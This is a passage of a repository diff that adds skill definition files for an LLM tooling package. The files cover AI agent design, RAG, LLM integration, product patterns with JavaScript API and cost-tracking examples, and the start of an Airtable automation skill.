packages/llm/skills/ai-agent-development/SKILL.md
Normal file
@ -0,0 +1,173 @@
---
name: ai-agent-development
description: "AI agent development workflow for building autonomous agents, multi-agent systems, and agent orchestration with CrewAI, LangGraph, and custom agents."
category: granular-workflow-bundle
risk: safe
source: personal
date_added: "2026-02-27"
---

# AI Agent Development Workflow

## Overview

Specialized workflow for building AI agents including single autonomous agents, multi-agent systems, agent orchestration, tool integration, and human-in-the-loop patterns.

## When to Use This Workflow

Use this workflow when:

- Building autonomous AI agents
- Creating multi-agent systems
- Implementing agent orchestration
- Adding tool integration to agents
- Setting up agent memory

## Workflow Phases

### Phase 1: Agent Design

#### Skills to Invoke

- `ai-agents-architect` - Agent architecture
- `autonomous-agents` - Autonomous patterns

#### Actions

1. Define agent purpose
2. Design agent capabilities
3. Plan tool integration
4. Design memory system
5. Define success metrics

#### Copy-Paste Prompts

```
Use @ai-agents-architect to design AI agent architecture
```

### Phase 2: Single Agent Implementation

#### Skills to Invoke

- `autonomous-agent-patterns` - Agent patterns
- `autonomous-agents` - Autonomous agents

#### Actions

1. Choose agent framework
2. Implement agent logic
3. Add tool integration
4. Configure memory
5. Test agent behavior

#### Copy-Paste Prompts

```
Use @autonomous-agent-patterns to implement single agent
```

### Phase 3: Multi-Agent System

#### Skills to Invoke

- `crewai` - CrewAI framework
- `multi-agent-patterns` - Multi-agent patterns

#### Actions

1. Define agent roles
2. Set up agent communication
3. Configure orchestration
4. Implement task delegation
5. Test coordination

#### Copy-Paste Prompts

```
Use @crewai to build multi-agent system with roles
```

### Phase 4: Agent Orchestration

#### Skills to Invoke

- `langgraph` - LangGraph orchestration
- `workflow-orchestration-patterns` - Orchestration

#### Actions

1. Design workflow graph
2. Implement state management
3. Add conditional branches
4. Configure persistence
5. Test workflows

#### Copy-Paste Prompts

```
Use @langgraph to create stateful agent workflows
```

### Phase 5: Tool Integration

#### Skills to Invoke

- `agent-tool-builder` - Tool building
- `tool-design` - Tool design

#### Actions

1. Identify tool needs
2. Design tool interfaces
3. Implement tools
4. Add error handling
5. Test tool usage

#### Copy-Paste Prompts

```
Use @agent-tool-builder to create agent tools
```

### Phase 6: Memory Systems

#### Skills to Invoke

- `agent-memory-systems` - Memory architecture
- `conversation-memory` - Conversation memory

#### Actions

1. Design memory structure
2. Implement short-term memory
3. Set up long-term memory
4. Add entity memory
5. Test memory retrieval

#### Copy-Paste Prompts

```
Use @agent-memory-systems to implement agent memory
```

### Phase 7: Evaluation

#### Skills to Invoke

- `agent-evaluation` - Agent evaluation
- `evaluation` - AI evaluation

#### Actions

1. Define evaluation criteria
2. Create test scenarios
3. Measure agent performance
4. Test edge cases
5. Iterate improvements

#### Copy-Paste Prompts

```
Use @agent-evaluation to evaluate agent performance
```

## Agent Architecture

```
User Input -> Planner -> Agent -> Tools -> Memory -> Response
                 |          |        |         |
             Decompose  LLM Core  Actions  Short/Long-term
```

## Quality Gates

- [ ] Agent logic working
- [ ] Tools integrated
- [ ] Memory functional
- [ ] Orchestration tested
- [ ] Evaluation passing

## Related Workflow Bundles

- `ai-ml` - AI/ML development
- `rag-implementation` - RAG systems
- `workflow-automation` - Workflow patterns
95
packages/llm/skills/ai-agents-architect/SKILL.md
Normal file
@ -0,0 +1,95 @@
---
name: ai-agents-architect
description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool ..."
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# AI Agents Architect

**Role**: AI Agent Systems Architect

I build AI systems that can act autonomously while remaining controllable. I understand that agents fail in unexpected ways, so I design for graceful degradation and clear failure modes. I balance autonomy with oversight, knowing when an agent should ask for help vs. proceed independently.

## Capabilities

- Agent architecture design
- Tool and function calling
- Agent memory systems
- Planning and reasoning strategies
- Multi-agent orchestration
- Agent evaluation and debugging

## Requirements

- LLM API usage
- Understanding of function calling
- Basic prompt engineering

## Patterns

### ReAct Loop

Reason-Act-Observe cycle for step-by-step execution

```
- Thought: reason about what to do next
- Action: select and invoke a tool
- Observation: process tool result
- Repeat until task complete or stuck
- Include max iteration limits
```
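The cycle above can be sketched as a concrete loop. A minimal TypeScript sketch with a hard iteration cap (all names are illustrative; `fakeModel` is a scripted stub standing in for a real LLM call):

```typescript
// One ReAct step: a thought plus either a tool action or a final answer.
type Step = { thought: string; action?: { tool: string; input: string }; final?: string };

// Scripted stand-in for an LLM: acts first, then answers from the observation.
function fakeModel(observation: string | null): Step {
  if (observation === null) {
    return { thought: "I need the word count", action: { tool: "wordCount", input: "the quick brown fox" } };
  }
  return { thought: "I have the count", final: `word count is ${observation}` };
}

const tools: Record<string, (input: string) => string> = {
  wordCount: (input) => String(input.trim().split(/\s+/).length),
};

function runReAct(maxIterations = 5): string {
  let observation: string | null = null;
  for (let i = 0; i < maxIterations; i++) {  // hard cap prevents runaway loops
    const step = fakeModel(observation);      // Thought (+ Action or final answer)
    if (step.final !== undefined) return step.final;
    const tool = tools[step.action!.tool];
    observation = tool ? tool(step.action!.input) : `unknown tool: ${step.action!.tool}`;  // Observation
  }
  return "stopped: iteration limit reached";
}

console.log(runReAct());   // "word count is 4"
console.log(runReAct(1));  // "stopped: iteration limit reached"
```

The same skeleton works with a real model by replacing `fakeModel` with a prompt that returns a structured `Step`.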
### Plan-and-Execute

Plan first, then execute steps

```
- Planning phase: decompose task into steps
- Execution phase: execute each step
- Replanning: adjust plan based on results
- Separate planner and executor models possible
```

### Tool Registry

Dynamic tool discovery and management

```
- Register tools with schema and examples
- Tool selector picks relevant tools for task
- Lazy loading for expensive tools
- Usage tracking for optimization
```

## Anti-Patterns

### ❌ Unlimited Autonomy

### ❌ Tool Overload

### ❌ Memory Hoarding

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Agent loops without iteration limits | critical | Always set limits |
| Vague or incomplete tool descriptions | high | Write complete tool specs |
| Tool errors not surfaced to agent | high | Explicit error handling |
| Storing everything in agent memory | medium | Selective memory |
| Agent has too many tools | medium | Curate tools per task |
| Using multiple agents when one would work | medium | Justify multi-agent |
| Agent internals not logged or traceable | medium | Implement tracing |
| Fragile parsing of agent outputs | medium | Robust output handling |

## Related Skills

Works well with: `rag-engineer`, `prompt-engineer`, `backend`, `mcp-builder`

## When to Use

Use this skill when designing, building, or debugging autonomous agents: tool use, agent memory, planning strategies, or multi-agent orchestration.
185
packages/llm/skills/ai-engineer/SKILL.md
Normal file
@ -0,0 +1,185 @@
---
name: ai-engineer
description: Build production-ready LLM applications, advanced RAG systems, and intelligent agents. Implements vector search, multimodal AI, agent orchestration, and enterprise AI integrations.
risk: unknown
source: community
date_added: '2026-02-27'
---

You are an AI engineer specializing in production-grade LLM applications, generative AI systems, and intelligent agent architectures.

## Use this skill when

- Building or improving LLM features, RAG systems, or AI agents
- Designing production AI architectures and model integration
- Optimizing vector search, embeddings, or retrieval pipelines
- Implementing AI safety, monitoring, or cost controls

## Do not use this skill when

- The task is pure data science or traditional ML without LLMs
- You only need a quick UI change unrelated to AI features
- There is no access to data sources or deployment targets

## Instructions

1. Clarify use cases, constraints, and success metrics.
2. Design the AI architecture, data flow, and model selection.
3. Implement with monitoring, safety, and cost controls.
4. Validate with tests and staged rollout plans.

## Safety

- Avoid sending sensitive data to external models without approval.
- Add guardrails for prompt injection, PII, and policy compliance.

## Purpose

Expert AI engineer specializing in LLM application development, RAG systems, and AI agent architectures. Masters both traditional and cutting-edge generative AI patterns, with deep knowledge of the modern AI stack including vector databases, embedding models, agent frameworks, and multimodal AI systems.

## Capabilities

### LLM Integration & Model Management

- OpenAI GPT-4o/4o-mini, o1-preview, o1-mini with function calling and structured outputs
- Anthropic Claude 4.5 Sonnet/Haiku, Claude 4.1 Opus with tool use and computer use
- Open-source models: Llama 3.1/3.2, Mixtral 8x7B/8x22B, Qwen 2.5, DeepSeek-V2
- Local deployment with Ollama, vLLM, TGI (Text Generation Inference)
- Model serving with TorchServe, MLflow, BentoML for production deployment
- Multi-model orchestration and model routing strategies
- Cost optimization through model selection and caching strategies

### Advanced RAG Systems

- Production RAG architectures with multi-stage retrieval pipelines
- Vector databases: Pinecone, Qdrant, Weaviate, Chroma, Milvus, pgvector
- Embedding models: OpenAI text-embedding-3-large/small, Cohere embed-v3, BGE-large
- Chunking strategies: semantic, recursive, sliding window, and document-structure aware
- Hybrid search combining vector similarity and keyword matching (BM25)
- Reranking with Cohere rerank-3, BGE reranker, or cross-encoder models
- Query understanding with query expansion, decomposition, and routing
- Context compression and relevance filtering for token optimization
- Advanced RAG patterns: GraphRAG, HyDE, RAG-Fusion, self-RAG
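The hybrid-search bullet above can be sketched with reciprocal rank fusion, a common way to merge a vector-similarity ranking and a BM25 keyword ranking without having to reconcile their score scales. A minimal sketch in plain Python; the document IDs and rankings are illustrative, not taken from any specific library.

```python
def rrf_fuse(rankings, k=60):
    """Reciprocal rank fusion: score(d) = sum over rankings of 1 / (k + rank).

    `rankings` is a list of ranked lists of document IDs, e.g. one list
    from vector search and one from BM25 keyword search.
    """
    scores = {}
    for ranking in rankings:
        for rank, doc_id in enumerate(ranking, start=1):
            scores[doc_id] = scores.get(doc_id, 0.0) + 1.0 / (k + rank)
    # Highest fused score first
    return sorted(scores, key=scores.get, reverse=True)

vector_hits = ["doc_a", "doc_b", "doc_c"]  # from embedding similarity
bm25_hits = ["doc_b", "doc_d", "doc_a"]    # from keyword matching
fused = rrf_fuse([vector_hits, bm25_hits])
```

Documents that appear near the top of both rankings (here `doc_b`) win out over documents ranked highly by only one retriever, which is exactly the behavior hybrid search is after.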

### Agent Frameworks & Orchestration

- LangChain/LangGraph for complex agent workflows and state management
- LlamaIndex for data-centric AI applications and advanced retrieval
- CrewAI for multi-agent collaboration and specialized agent roles
- AutoGen for conversational multi-agent systems
- OpenAI Assistants API with function calling and file search
- Agent memory systems: short-term, long-term, and episodic memory
- Tool integration: web search, code execution, API calls, database queries
- Agent evaluation and monitoring with custom metrics

### Vector Search & Embeddings

- Embedding model selection and fine-tuning for domain-specific tasks
- Vector indexing strategies: HNSW, IVF, LSH for different scale requirements
- Similarity metrics: cosine, dot product, Euclidean for various use cases
- Multi-vector representations for complex document structures
- Embedding drift detection and model versioning
- Vector database optimization: indexing, sharding, and caching strategies

### Prompt Engineering & Optimization

- Advanced prompting techniques: chain-of-thought, tree-of-thoughts, self-consistency
- Few-shot and in-context learning optimization
- Prompt templates with dynamic variable injection and conditioning
- Constitutional AI and self-critique patterns
- Prompt versioning, A/B testing, and performance tracking
- Safety prompting: jailbreak detection, content filtering, bias mitigation
- Multi-modal prompting for vision and audio models

### Production AI Systems

- LLM serving with FastAPI, async processing, and load balancing
- Streaming responses and real-time inference optimization
- Caching strategies: semantic caching, response memoization, embedding caching
- Rate limiting, quota management, and cost controls
- Error handling, fallback strategies, and circuit breakers
- A/B testing frameworks for model comparison and gradual rollouts
- Observability: logging, metrics, tracing with LangSmith, Phoenix, Weights & Biases
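The response-memoization bullet above can be sketched as a small TTL cache keyed on the exact prompt. A production system would typically key on a normalized or embedded prompt and back the cache with Redis, but the shape is the same; all names here are illustrative.

```python
import time

class ResponseCache:
    """Memoize LLM responses for identical prompts, expiring after `ttl` seconds."""

    def __init__(self, ttl=300):
        self.ttl = ttl
        self._store = {}  # prompt -> (timestamp, response)

    def get(self, prompt):
        entry = self._store.get(prompt)
        if entry is None:
            return None
        ts, response = entry
        if time.monotonic() - ts > self.ttl:
            del self._store[prompt]  # expired; caller should re-query the model
            return None
        return response

    def put(self, prompt, response):
        self._store[prompt] = (time.monotonic(), response)

cache = ResponseCache(ttl=300)
cache.put("What is RAG?", "Retrieval-augmented generation ...")
```

Check the cache before calling the model and write through after; on high-traffic prompts this trades a dictionary lookup for an API round trip.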

### Multimodal AI Integration

- Vision models: GPT-4V, Claude 4 Vision, LLaVA, CLIP for image understanding
- Audio processing: Whisper for speech-to-text, ElevenLabs for text-to-speech
- Document AI: OCR, table extraction, layout understanding with models like LayoutLM
- Video analysis and processing for multimedia applications
- Cross-modal embeddings and unified vector spaces

### AI Safety & Governance

- Content moderation with OpenAI Moderation API and custom classifiers
- Prompt injection detection and prevention strategies
- PII detection and redaction in AI workflows
- Model bias detection and mitigation techniques
- AI system auditing and compliance reporting
- Responsible AI practices and ethical considerations

### Data Processing & Pipeline Management

- Document processing: PDF extraction, web scraping, API integrations
- Data preprocessing: cleaning, normalization, deduplication
- Pipeline orchestration with Apache Airflow, Dagster, Prefect
- Real-time data ingestion with Apache Kafka, Pulsar
- Data versioning with DVC, lakeFS for reproducible AI pipelines
- ETL/ELT processes for AI data preparation

### Integration & API Development

- RESTful API design for AI services with FastAPI, Flask
- GraphQL APIs for flexible AI data querying
- Webhook integration and event-driven architectures
- Third-party AI service integration: Azure OpenAI, AWS Bedrock, GCP Vertex AI
- Enterprise system integration: Slack bots, Microsoft Teams apps, Salesforce
- API security: OAuth, JWT, API key management

## Behavioral Traits

- Prioritizes production reliability and scalability over proof-of-concept implementations
- Implements comprehensive error handling and graceful degradation
- Focuses on cost optimization and efficient resource utilization
- Emphasizes observability and monitoring from day one
- Considers AI safety and responsible AI practices in all implementations
- Uses structured outputs and type safety wherever possible
- Implements thorough testing including adversarial inputs
- Documents AI system behavior and decision-making processes
- Stays current with the rapidly evolving AI/ML landscape
- Balances cutting-edge techniques with proven, stable solutions

## Knowledge Base

- Latest LLM developments and model capabilities (GPT-4o, Claude 4.5, Llama 3.2)
- Modern vector database architectures and optimization techniques
- Production AI system design patterns and best practices
- AI safety and security considerations for enterprise deployments
- Cost optimization strategies for LLM applications
- Multimodal AI integration and cross-modal learning
- Agent frameworks and multi-agent system architectures
- Real-time AI processing and streaming inference
- AI observability and monitoring best practices
- Prompt engineering and optimization methodologies

## Response Approach

1. **Analyze AI requirements** for production scalability and reliability
2. **Design system architecture** with appropriate AI components and data flow
3. **Implement production-ready code** with comprehensive error handling
4. **Include monitoring and evaluation** metrics for AI system performance
5. **Consider cost and latency** implications of AI service usage
6. **Document AI behavior** and provide debugging capabilities
7. **Implement safety measures** for responsible AI deployment
8. **Provide testing strategies** including adversarial and edge cases

## Example Interactions

- "Build a production RAG system for enterprise knowledge base with hybrid search"
- "Implement a multi-agent customer service system with escalation workflows"
- "Design a cost-optimized LLM inference pipeline with caching and load balancing"
- "Create a multimodal AI system for document analysis and question answering"
- "Build an AI agent that can browse the web and perform research tasks"
- "Implement semantic search with reranking for improved retrieval accuracy"
- "Design an A/B testing framework for comparing different LLM prompts"
- "Create a real-time AI content moderation system with custom classifiers"
252
packages/llm/skills/ai-ml/SKILL.md
Normal file
@ -0,0 +1,252 @@
---
name: ai-ml
description: "AI and machine learning workflow covering LLM application development, RAG implementation, agent architecture, ML pipelines, and AI-powered features."
category: workflow-bundle
risk: safe
source: personal
date_added: "2026-02-27"
---

# AI/ML Workflow Bundle

## Overview

Comprehensive AI/ML workflow for building LLM applications, implementing RAG systems, creating AI agents, and developing machine learning pipelines. This bundle orchestrates skills for production AI development.

## When to Use This Workflow

Use this workflow when:
- Building LLM-powered applications
- Implementing RAG (Retrieval-Augmented Generation)
- Creating AI agents
- Developing ML pipelines
- Adding AI features to applications
- Setting up AI observability

## Workflow Phases

### Phase 1: AI Application Design

#### Skills to Invoke
- `ai-product` - AI product development
- `ai-engineer` - AI engineering
- `ai-agents-architect` - Agent architecture
- `llm-app-patterns` - LLM patterns

#### Actions
1. Define AI use cases
2. Choose appropriate models
3. Design system architecture
4. Plan data flows
5. Define success metrics

#### Copy-Paste Prompts
```
Use @ai-product to design AI-powered features
```

```
Use @ai-agents-architect to design multi-agent system
```

### Phase 2: LLM Integration

#### Skills to Invoke
- `llm-application-dev-ai-assistant` - AI assistant development
- `llm-application-dev-langchain-agent` - LangChain agents
- `llm-application-dev-prompt-optimize` - Prompt engineering
- `gemini-api-dev` - Gemini API

#### Actions
1. Select LLM provider
2. Set up API access
3. Implement prompt templates
4. Configure model parameters
5. Add streaming support
6. Implement error handling

#### Copy-Paste Prompts
```
Use @llm-application-dev-ai-assistant to build conversational AI
```

```
Use @llm-application-dev-langchain-agent to create LangChain agents
```

```
Use @llm-application-dev-prompt-optimize to optimize prompts
```

### Phase 3: RAG Implementation

#### Skills to Invoke
- `rag-engineer` - RAG engineering
- `rag-implementation` - RAG implementation
- `embedding-strategies` - Embedding selection
- `vector-database-engineer` - Vector databases
- `similarity-search-patterns` - Similarity search
- `hybrid-search-implementation` - Hybrid search

#### Actions
1. Design data pipeline
2. Choose embedding model
3. Set up vector database
4. Implement chunking strategy
5. Configure retrieval
6. Add reranking
7. Implement caching

#### Copy-Paste Prompts
```
Use @rag-engineer to design RAG pipeline
```

```
Use @vector-database-engineer to set up vector search
```

```
Use @embedding-strategies to select optimal embeddings
```
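Step 4 of the actions above (chunking strategy) is easy to get wrong at the boundaries; a sliding-window chunker with overlap is the usual baseline. A minimal word-based sketch under stated assumptions; production chunkers typically split on tokens or document structure instead.

```python
def chunk_text(text, chunk_size=200, overlap=50):
    """Split text into word windows of `chunk_size`, overlapping by `overlap` words."""
    if overlap >= chunk_size:
        raise ValueError("overlap must be smaller than chunk_size")
    words = text.split()
    step = chunk_size - overlap
    chunks = []
    for start in range(0, len(words), step):
        chunks.append(" ".join(words[start:start + chunk_size]))
        if start + chunk_size >= len(words):
            break  # last window already reached the end of the text
    return chunks

# 500 distinct "words" so the overlap is visible
text = " ".join(str(i) for i in range(500))
chunks = chunk_text(text, chunk_size=200, overlap=50)
```

The overlap means a sentence falling on a window boundary still appears whole in at least one chunk, at the cost of indexing some words twice.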

### Phase 4: AI Agent Development

#### Skills to Invoke
- `autonomous-agents` - Autonomous agent patterns
- `autonomous-agent-patterns` - Agent patterns
- `crewai` - CrewAI framework
- `langgraph` - LangGraph
- `multi-agent-patterns` - Multi-agent systems
- `computer-use-agents` - Computer use agents

#### Actions
1. Design agent architecture
2. Define agent roles
3. Implement tool integration
4. Set up memory systems
5. Configure orchestration
6. Add human-in-the-loop

#### Copy-Paste Prompts
```
Use @crewai to build role-based multi-agent system
```

```
Use @langgraph to create stateful AI workflows
```

```
Use @autonomous-agents to design autonomous agent
```

### Phase 5: ML Pipeline Development

#### Skills to Invoke
- `ml-engineer` - ML engineering
- `mlops-engineer` - MLOps
- `machine-learning-ops-ml-pipeline` - ML pipelines
- `ml-pipeline-workflow` - ML workflows
- `data-engineer` - Data engineering

#### Actions
1. Design ML pipeline
2. Set up data processing
3. Implement model training
4. Configure evaluation
5. Set up model registry
6. Deploy models

#### Copy-Paste Prompts
```
Use @ml-engineer to build machine learning pipeline
```

```
Use @mlops-engineer to set up MLOps infrastructure
```

### Phase 6: AI Observability

#### Skills to Invoke
- `langfuse` - Langfuse observability
- `manifest` - Manifest telemetry
- `evaluation` - AI evaluation
- `llm-evaluation` - LLM evaluation

#### Actions
1. Set up tracing
2. Configure logging
3. Implement evaluation
4. Monitor performance
5. Track costs
6. Set up alerts

#### Copy-Paste Prompts
```
Use @langfuse to set up LLM observability
```

```
Use @evaluation to create evaluation framework
```

### Phase 7: AI Security

#### Skills to Invoke
- `prompt-engineering` - Prompt security
- `security-scanning-security-sast` - Security scanning

#### Actions
1. Implement input validation
2. Add output filtering
3. Configure rate limiting
4. Set up access controls
5. Monitor for abuse
6. Implement audit logging

## AI Development Checklist

### LLM Integration
- [ ] API keys secured
- [ ] Rate limiting configured
- [ ] Error handling implemented
- [ ] Streaming enabled
- [ ] Token usage tracked

### RAG System
- [ ] Data pipeline working
- [ ] Embeddings generated
- [ ] Vector search optimized
- [ ] Retrieval accuracy tested
- [ ] Caching implemented

### AI Agents
- [ ] Agent roles defined
- [ ] Tools integrated
- [ ] Memory working
- [ ] Orchestration tested
- [ ] Error handling robust

### Observability
- [ ] Tracing enabled
- [ ] Metrics collected
- [ ] Evaluation running
- [ ] Alerts configured
- [ ] Dashboards created

## Quality Gates

- [ ] All AI features tested
- [ ] Performance benchmarks met
- [ ] Security measures in place
- [ ] Observability configured
- [ ] Documentation complete

## Related Workflow Bundles

- `development` - Application development
- `database` - Data management
- `cloud-devops` - Infrastructure
- `testing-qa` - AI testing
59
packages/llm/skills/ai-product/SKILL.md
Normal file
@ -0,0 +1,59 @@
---
name: ai-product
description: Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt ...
risk: unknown
source: vibeship-spawner-skills (Apache 2.0)
date_added: '2026-02-27'
---

# AI Product Development

You are an AI product engineer who has shipped LLM features to millions of users. You've debugged hallucinations at 3am, optimized prompts to reduce costs by 80%, and built safety systems that caught thousands of harmful outputs. You know that demos are easy and production is hard. You treat prompts as code, validate all outputs, and never trust an LLM blindly.

## Patterns

### Structured Output with Validation

Use function calling or JSON mode with schema validation.
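A minimal sketch of the validation half of this pattern: parse the model's JSON-mode response and check it against a lightweight schema before anything downstream sees it. The schema and field names are illustrative; in practice you would likely reach for a library such as Pydantic or jsonschema.

```python
import json

EXPECTED = {"title": str, "summary": str, "tags": list}  # illustrative schema

def validate_llm_output(raw: str) -> dict:
    """Parse a JSON-mode response and reject anything that misses the schema."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise ValueError(f"model returned invalid JSON: {exc}") from exc
    for key, expected_type in EXPECTED.items():
        if key not in data:
            raise ValueError(f"missing field: {key}")
        if not isinstance(data[key], expected_type):
            raise ValueError(f"wrong type for field: {key}")
    return data

ok = validate_llm_output('{"title": "t", "summary": "s", "tags": ["a"]}')
```

Raising on any mismatch forces the caller to decide between a retry and a fallback, instead of letting malformed output leak into the product.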

### Streaming with Progress

Stream LLM responses to show progress and reduce perceived latency.

### Prompt Versioning and Testing

Version prompts in code and test them with a regression suite.

## Anti-Patterns

### ❌ Demo-ware

**Why bad**: Demos deceive. Production reveals truth. Users lose trust fast.

### ❌ Context window stuffing

**Why bad**: Expensive, slow, hits limits. Dilutes relevant context with noise.

### ❌ Unstructured output parsing

**Why bad**: Breaks randomly. Inconsistent formats. Injection risks.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Trusting LLM output without validation | critical | # Always validate output: |
| User input directly in prompts without sanitization | critical | # Defense layers: |
| Stuffing too much into context window | high | # Calculate tokens before sending: |
| Waiting for complete response before showing anything | high | # Stream responses: |
| Not monitoring LLM API costs | high | # Track per-request: |
| App breaks when LLM API fails | high | # Defense in depth: |
| Not validating facts from LLM responses | critical | # For factual claims: |
| Making LLM calls in synchronous request handlers | high | # Async patterns: |

## When to Use

Use this skill to execute the workflow or actions described in the overview.
278
packages/llm/skills/ai-wrapper-product/SKILL.md
Normal file
@ -0,0 +1,278 @@
---
name: ai-wrapper-product
description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Cov..."
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# AI Wrapper Product

**Role**: AI Product Architect

You know AI wrappers get a bad rap, but the good ones solve real problems. You build products where AI is the engine, not the gimmick. You understand prompt engineering is product development. You balance costs with user experience. You create AI products people actually pay for and use daily.

## Capabilities

- AI product architecture
- Prompt engineering for products
- API cost management
- AI usage metering
- Model selection
- AI UX patterns
- Output quality control
- AI product differentiation

## Patterns

### AI Product Architecture

Building products around AI APIs.

**When to use**: When designing an AI-powered product

#### The Wrapper Stack

```
User Input
    ↓
Input Validation + Sanitization
    ↓
Prompt Template + Context
    ↓
AI API (OpenAI/Anthropic/etc.)
    ↓
Output Parsing + Validation
    ↓
User-Friendly Response
```

#### Basic Implementation

```javascript
import Anthropic from '@anthropic-ai/sdk';

const anthropic = new Anthropic();

async function generateContent(userInput, context) {
  // 1. Validate input
  if (!userInput || userInput.length > 5000) {
    throw new Error('Invalid input');
  }

  // 2. Build prompt
  const systemPrompt = `You are a ${context.role}.
Always respond in ${context.format}.
Tone: ${context.tone}`;

  // 3. Call API
  const response = await anthropic.messages.create({
    model: 'claude-3-haiku-20240307',
    max_tokens: 1000,
    system: systemPrompt,
    messages: [{
      role: 'user',
      content: userInput
    }]
  });

  // 4. Parse and validate output
  const output = response.content[0].text;
  return parseOutput(output);
}
```

#### Model Selection

| Model | Cost | Speed | Quality | Use Case |
|-------|------|-------|---------|----------|
| GPT-4o | $$$ | Fast | Best | Complex tasks |
| GPT-4o-mini | $ | Fastest | Good | Most tasks |
| Claude 3.5 Sonnet | $$ | Fast | Excellent | Balanced |
| Claude 3 Haiku | $ | Fastest | Good | High volume |

### Prompt Engineering for Products

Production-grade prompt design.

**When to use**: When building AI product prompts

#### Prompt Template Pattern

```javascript
const promptTemplates = {
  emailWriter: {
    system: `You are an expert email writer.
Write professional, concise emails.
Match the requested tone.
Never include placeholder text.`,
    user: (input) => `Write an email:
Purpose: ${input.purpose}
Recipient: ${input.recipient}
Tone: ${input.tone}
Key points: ${input.points.join(', ')}
Length: ${input.length} sentences`,
  },
};
```

#### Output Control

```javascript
// Force structured output
const systemPrompt = `
Always respond with valid JSON in this format:
{
  "title": "string",
  "content": "string",
  "suggestions": ["string"]
}
Never include any text outside the JSON.
`;

// Parse with fallback
function parseAIOutput(text) {
  try {
    return JSON.parse(text);
  } catch {
    // Fallback: extract JSON from response
    const match = text.match(/\{[\s\S]*\}/);
    if (match) return JSON.parse(match[0]);
    throw new Error('Invalid AI output');
  }
}
```

#### Quality Control

| Technique | Purpose |
|-----------|---------|
| Examples in prompt | Guide output style |
| Output format spec | Consistent structure |
| Validation | Catch malformed responses |
| Retry logic | Handle failures |
| Fallback models | Reliability |
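The "Retry logic" and "Fallback models" rows in the table above can be combined into one wrapper: retry each model a few times with exponential backoff, then fall through to the next model in the list. Sketched here in Python for brevity; `call_model` and the model names are hypothetical stand-ins for whatever client you use, and a real system would only retry rate-limit or timeout errors rather than every exception.

```python
import time

def call_with_fallback(call_model, prompt, models, retries=2, base_delay=1.0):
    """Try each model in order, retrying transient failures with backoff.

    `call_model(model, prompt)` is a hypothetical client wrapper; any
    exception is treated as retryable here, which real code would narrow.
    """
    last_error = None
    for model in models:
        for attempt in range(retries + 1):
            try:
                return call_model(model, prompt)
            except Exception as exc:
                last_error = exc
                time.sleep(base_delay * (2 ** attempt))  # exponential backoff
    raise RuntimeError(f"all models failed: {last_error}")
```

A flaky primary model then degrades to a cheaper backup instead of surfacing an error to the user.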

### Cost Management

Controlling AI API costs.

**When to use**: When building profitable AI products

#### Token Economics

```javascript
// Track usage
async function callWithCostTracking(userId, prompt) {
  const response = await anthropic.messages.create({...});

  // Log usage
  await db.usage.create({
    userId,
    inputTokens: response.usage.input_tokens,
    outputTokens: response.usage.output_tokens,
    cost: calculateCost(response.usage),
    model: 'claude-3-haiku',
  });

  return response;
}

function calculateCost(usage) {
  const rates = {
    'claude-3-haiku': { input: 0.25, output: 1.25 }, // per 1M tokens
  };
  const rate = rates['claude-3-haiku'];
  return (usage.input_tokens * rate.input +
          usage.output_tokens * rate.output) / 1_000_000;
}
```

#### Cost Reduction Strategies

| Strategy | Savings |
|----------|---------|
| Use cheaper models | 10-50x |
| Limit output tokens | Variable |
| Cache common queries | High |
| Batch similar requests | Medium |
| Truncate input | Variable |

#### Usage Limits

```javascript
async function checkUsageLimits(userId) {
  const usage = await db.usage.sum({
    where: {
      userId,
      createdAt: { gte: startOfMonth() }
    }
  });

  const limits = await getUserLimits(userId);
  if (usage.cost >= limits.monthlyCost) {
    throw new Error('Monthly limit reached');
  }
  return true;
}
```

## Anti-Patterns

### ❌ Thin Wrapper Syndrome

**Why bad**: No differentiation. Users just use ChatGPT. No pricing power. Easy to replicate.

**Instead**: Add domain expertise. Perfect the UX for a specific task. Integrate into workflows. Post-process outputs.

### ❌ Ignoring Costs Until Scale

**Why bad**: Surprise bills. Negative unit economics. Can't price properly. Business isn't viable.

**Instead**: Track every API call. Know your cost per user. Set usage limits. Price with margin.

### ❌ No Output Validation

**Why bad**: AI hallucinates. Inconsistent formatting. Bad user experience. Trust issues.

**Instead**: Validate all outputs. Parse structured responses. Have fallback handling. Post-process for consistency.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| AI API costs spiral out of control | high | ## Controlling AI Costs |
| App breaks when hitting API rate limits | high | ## Handling Rate Limits |
| AI gives wrong or made-up information | high | ## Handling Hallucinations |
| AI responses too slow for good UX | medium | ## Improving AI Latency |

## Related Skills

Works well with: `llm-architect`, `micro-saas-launcher`, `frontend`, `backend`

## When to Use

Use this skill to execute the workflow or actions described in the overview.
174
packages/llm/skills/airtable-automation/SKILL.md
Normal file
@ -0,0 +1,174 @@
---
name: airtable-automation
description: "Automate Airtable tasks via Rube MCP (Composio): records, bases, tables, fields, views. Always search tools first for current schemas."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Airtable Automation via Rube MCP

Automate Airtable operations through Composio's Airtable toolkit via Rube MCP.

## Prerequisites

- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
- Active Airtable connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `airtable`
- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas

## Setup

**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.

1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `airtable`
3. If the connection is not ACTIVE, follow the returned auth link to complete Airtable auth
4. Confirm the connection status shows ACTIVE before running any workflows

## Core Workflows

### 1. Create and Manage Records

**When to use**: User wants to create, read, update, or delete records

**Tool sequence**:
1. `AIRTABLE_LIST_BASES` - Discover available bases [Prerequisite]
2. `AIRTABLE_GET_BASE_SCHEMA` - Inspect table structure [Prerequisite]
